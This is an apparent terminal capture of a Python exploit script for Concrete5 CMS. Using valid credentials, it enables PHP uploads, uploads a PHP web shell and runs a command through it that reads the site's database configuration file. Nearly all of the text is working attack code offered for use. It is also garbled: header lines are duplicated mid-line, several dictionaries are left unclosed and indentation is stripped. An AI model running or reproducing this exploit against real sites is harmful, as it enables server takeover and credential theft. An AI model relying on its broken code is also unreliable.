c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py
#!/usr/bin/env python
# shell-concrete5.py - module based on previous version
# created 29.04.2017. Bug ('featu c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py
#!/usr/bin/env python
# shell-concrete5.py - module based on previous version
# created 29.04.2017. Bug ('feature') is exploitable only
# when you will have a valid credentials.
import sys
import re
import requests

target = raw_input("[+] Hostname> ")
logMe = target + '/index.php/login'
session = requests.session()

initreq = session.get(logMe)
initresp = initreq.text

gettoken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
found = re.search(gettoken, initresp)

if found:
token = found.group(1)
print '[+] Found token: ' + str(token)

# assuming token is valid, let's log in
login_data = {
loglink = target + '/index.php/login/authenticate/concrete'
loginreq = session.post(loglink, data=login_data)

#afterlogin = target + '/index.php/dashboard/system'
afterlogin = target + '/index.php/dashboard/system/files/filetypes'
nextreq1 = session.get(afterlogin)
nextresp1 = nextreq1.text
print '[+] Cool, we're logged-in!'
#print afterlogin
#print nextresp1
print '[+] We are ready to go, extension-page is available.'
print ''

# construct POST with new.ext
newToken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
foundToken = re.search(newToken, nextresp1)

if foundToken:
newOne = foundToken.group(1)
print '[+] New token grabbed: ' + str(newOne)

data_ext = {
datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions'
datareq = session.post(datalink, data=data_ext)
dataresp = datareq.text
nowwecan = re.compile('file-access-file-types" class="form-control" rows="3">(.*?)</textarea>')
newexts = re.search(nowwecan, dataresp)

if newexts:
print '[+] Available now: '+ newexts.group(1)

print '[+] Time to upload shell...'

# next token to upload request
nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0'
tokreq3 = session.get(nextTokenUrl)
tokresp3 = tokreq3.text

grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/>')
foundit = re.search(grabNextTok, tokresp3)

if foundit:
tokentoup = foundit.group(1)
print '[+] Next token (3rd): ' + str( tokentoup )

# we are logged-in; preparing req to upload shell
saymyname = 'meshell3.php'

fp = open(saymyname,'w')
fp.write('<?php system($_GET["xx"]);')

# tmpshfile ready, do req now
up_files = { 'file':open(saymyname,'rb') }

up_params = {
upreqlink = target + '/index.php/ccm/system/file/upload'
upreqnow = session.post(upreqlink, files=up_files, data=up_params)
upresp = upreqnow.text
if saymyname in upresp:
print '[+] Shell properly uploaded. Time to find it ('+str(saymyname)+')'

searchme = target + '/index.php/dashboard/files/search'
dosearch = session.get(searchme)
meresp = dosearch.text

searchShLink = re.compile(saymyname+'","urlInline":"http:(.*?)download_file(.*?)view_inline(.*?)","urlDownload":')
foundShLink = re.search(searchShLink, meresp)

if foundShLink:
foundId = foundShLink.group(3)
shid = foundId.strip('/')
print '[+] Found link ID:' + str(shid)

preparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid)
prepreq = session.get(preparingProp)
prepresp = prepreq.text
whereareutxt = '<a target="_blank" href="(.*?)/application/files/(.*?)' + saymyname +'">'
whereareu = re.compile(whereareutxt)
foundme2 = re.search(whereareu, prepresp)

if foundme2:
print '[+] Shell is ready to use:'
shellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id'
print ' ' + shellshere

print '[+] "Finish him!" ;7'
finish = session.get(shellshere)
fintxt = finish.text
print '[+] Response:'
print fintxt
print ' ---------------'

print '[-] I can not upload our shell. Verify!'